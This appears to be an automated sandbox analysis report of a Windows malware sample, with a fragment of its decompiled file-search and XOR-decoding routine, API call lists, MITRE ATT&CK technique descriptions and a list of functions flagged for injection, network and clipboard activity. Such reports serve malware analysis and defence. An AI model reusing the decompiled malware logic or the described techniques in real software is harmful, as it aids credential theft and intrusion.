							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E00414B91();
							E00414B91();
							E00414B91();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E004159A4(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E00417114(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E00416815(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E00414B91();
							_t157 = E00416AA0(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E004159A4(0x90, _t171);
					_v648 = _t171;
					E0041BB58( &_v524,  &_v648, _t177, 1, 5, E00414BAB, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x00414bb1
0x00414bcf
0x00414e2f
0x00414e37
0x00414e37
0x00414bd5
0x00414bd8
0x00414c1b
0x00414c1e
0x00414c23
0x00414c28
0x00414c2a
0x00000000
0x00000000
0x00414c41
0x00414c46
0x00414c4a
0x00414c4d
0x00414e26
0x00414e2a
0x00000000
0x00414e2a
0x00414c5d
0x00414c6a
0x00414c78
0x00414c86
0x00414c94
0x00414c99
0x00414c9d
0x00414e10
0x00414e14
0x00414e21
0x00000000
0x00414e21
0x00414ca3
0x00414ca7
0x00414cab
0x00414cb7
0x00414cb7
0x00414cbb
0x00414cbf
0x00414cc3
0x00000000
0x00000000
0x00414cd3
0x00414ce5
0x00414cf5
0x00414d05
0x00414d07
0x00414d0c
0x00414d0e
0x00000000
0x00000000
0x00414d14
0x00414d19
0x00000000
0x00000000
0x00414d1f
0x00414d21
0x00000000
0x00000000
0x00414d27
0x00414d30
0x00414d35
0x00414d38
0x00414d3c
0x00414d45
0x00414d4c
0x00414d51
0x00414d53
0x00414d7d
0x00414d7f
0x00414d80
0x00414d84
0x00414d87
0x00000000
0x00000000
0x00414d8d
0x00414d90
0x00000000
0x00000000
0x00414d92
0x00414d94
0x00414d96
0x00000000
0x00000000
0x00414d98
0x00414d9a
0x00414da0
0x00414da0
0x00414da4
0x00000000
0x00000000
0x00414da6
0x00414da6
0x00414da8
0x00414daa
0x00000000
0x00000000
0x00000000
0x00000000
0x00414dac
0x00414dac
0x00414dac
0x00414db0
0x00414db1
0x00414db1
0x00414db7
0x00414db9
0x00414dbd
0x00414dc1
0x00414dc2
0x00414dc7
0x00414dc8
0x00414dcc
0x00414dd0
0x00414dd6
0x00414de0
0x00414de5
0x00414de8
0x00414dea
0x00414dec
0x00414df2
0x00414df7
0x00414df9
0x00414dfb
0x00414dfb
0x00414dfb
0x00414dfb
0x00414df9
0x00414dea
0x00000000
0x00414db9
0x00414d9c
0x00414d9e
0x00000000
0x00000000
0x00000000
0x00414d9e
0x00414d5a
0x00414d5e
0x00414d6e
0x00414d70
0x00414d73
0x00000000
0x00000000
0x00414d75
0x00414d7b
0x00000000
0x00000000
0x00000000
0x00414dfe
0x00414dfe
0x00414e06
0x00414e06
0x00414cb7
0x00000000
0x00414bda
0x00414bda
0x00414be3
0x00414bea
0x00414c0a
0x00000000
0x00414c0a

APIs

Part of subcall function 0041BCB4: PathCombineW.SHLWAPI(?,a@,?,004061E6,?,?), ref: 0041BCD3

StrStrIA.SHLWAPI(?,?,?,00000001,00000000,?,?), ref: 00414CD1
StrStrIA.SHLWAPI(?,?), ref: 00414CE3
StrStrIA.SHLWAPI(?,?), ref: 00414CF3
StrStrIA.SHLWAPI(?,?), ref: 00414D05

Part of subcall function 0041BB58: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041BB97
Part of subcall function 0041BB58: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0041BBBE
Part of subcall function 0041BB58: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0041BC08
Part of subcall function 0041BB58: Sleep.KERNEL32(00000000,?,?), ref: 0041BC65
Part of subcall function 0041BB58: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0041BC93
Part of subcall function 0041BB58: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0041BCA5

Memory Dump Source

Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 86b492fb9664b964d6276b9eadd936ccce854ea690ef4204226fa320a6bf3925
Instruction ID: cd4031350fba1f2ecaa8d00206ee9d8fdb259dcf368f291073119a17e474faa0
Opcode Fuzzy Hash: 86b492fb9664b964d6276b9eadd936ccce854ea690ef4204226fa320a6bf3925
Instruction Fuzzy Hash: 367188715083519FDB21DF29D801ADFB7E5AFC4718F00091EF884A72A2D738D9868B9A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report K8nV75e45o

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: K8nV75e45o.exe PID: 3924 Parent PID: 5616

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: K8nV75e45o.exe PID: 3924 Parent PID: 5616 K8nV75e45o.exeCOMMON

Executed Functions

Function 0040635A, Relevance: 42.2, APIs: 15, Strings: 9, Instructions: 229
libraryloadermemoryCOMMON

Function 00419A10, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

Function 0041A9C4, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Function 0040728B, Relevance: 9.1, APIs: 6, Instructions: 83
sleepCOMMON

Function 0040F20F, Relevance: 82.6, APIs: 27, Strings: 20, Instructions: 389
libraryloaderwindowCOMMON

Function 00406F85, Relevance: 30.2, APIs: 20, Instructions: 242
synchronizationsleepshutdownCOMMON

Function 0040EECB, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188
libraryloaderCOMMON

Function 00417D43, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 90
libraryloaderprocessCOMMON

Function 0040AE91, Relevance: 16.4, APIs: 5, Strings: 4, Instructions: 671
synchronizationnetworkCOMMONCrypto

Function 00405A43, Relevance: 15.1, APIs: 10, Instructions: 92
threadCOMMON

Function 0041618F, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109
windowCOMMON

Function 00412425, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 61
librarystringloaderCOMMON

Function 0041BB58, Relevance: 10.6, APIs: 7, Instructions: 109
sleepfilesynchronizationCOMMON

Function 00417AED, Relevance: 10.6, APIs: 7, Instructions: 52
threadCOMMON

Function 004122FC, Relevance: 9.1, APIs: 6, Instructions: 83
threadnativeinjectionCOMMON

Function 00418469, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44
libraryloaderCOMMON

Function 0041D159, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207
stringCOMMON

Function 0041BA9D, Relevance: 7.6, APIs: 5, Instructions: 61
fileCOMMON

Function 0040BA8F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45
shutdownCOMMON

Function 0041AD83, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Function 00417A96, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Function 00412245, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Function 00412C9A, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Function 0040745C, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 0040C056, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Function 0041201E, Relevance: 1.5, APIs: 1, Instructions: 32
networkCOMMON

Function 0041654B, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Function 004098BE, Relevance: 1.4, Strings: 1, Instructions: 117
COMMON

Function 004175D2, Relevance: 1.3, Strings: 1, Instructions: 70
COMMONCrypto

Function 004021F3, Relevance: .2, Instructions: 236
COMMONCrypto

Function 00419174, Relevance: .2, Instructions: 190
COMMONCrypto

Function 00408D10, Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 308
COMMON

Function 0040809E, Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 205
filewindowregistryCOMMON

Function 00415CD2, Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 194
COMMON

Function 00410AA2, Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 180
networkCOMMON

Function 004085D0, Relevance: 22.6, APIs: 15, Instructions: 132
windowCOMMON

Function 0041A107, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 52
libraryloadermemoryCOMMON

Function 0040D33C, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Function 00408309, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Function 004094F1, Relevance: 16.6, APIs: 11, Instructions: 118
synchronizationthreadwindowCOMMON

Function 00407A82, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 274
threadwindowCOMMON

Function 00418109, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67
networkCOMMON

Function 0041D404, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160
synchronizationthreadCOMMON

Function 0040E73F, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 99
libraryloaderCOMMON

Function 00406239, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87
fileCOMMON

Function 00409AF5, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Function 0040D022, Relevance: 13.7, APIs: 6, Strings: 3, Instructions: 247
COMMON

Function 00413D4A, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156
COMMON

Function 0041AC64, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 108
injectionCOMMON

Function 0040C833, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 30
libraryloaderCOMMON

Function 0041CED0, Relevance: 12.2, APIs: 8, Instructions: 180
threadsynchronizationCOMMON

Function 00411B95, Relevance: 12.2, APIs: 8, Instructions: 165
COMMON

Function 00410F1A, Relevance: 12.2, APIs: 8, Instructions: 151
synchronizationnetworkCOMMON

Function 0041CB9B, Relevance: 12.1, APIs: 8, Instructions: 116
processCOMMON

Function 004075F4, Relevance: 12.1, APIs: 8, Instructions: 107
synchronizationCOMMON

Function 00410561, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 367
timenetworkCOMMON

Function 004051A9, Relevance: 10.7, APIs: 7, Instructions: 216
filestringCOMMON

Function 0041C9CD, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Function 004067D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 87
injectionCOMMON

Function 00417EE1, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Function 00417B75, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Function 004162F5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70
clipboardCOMMON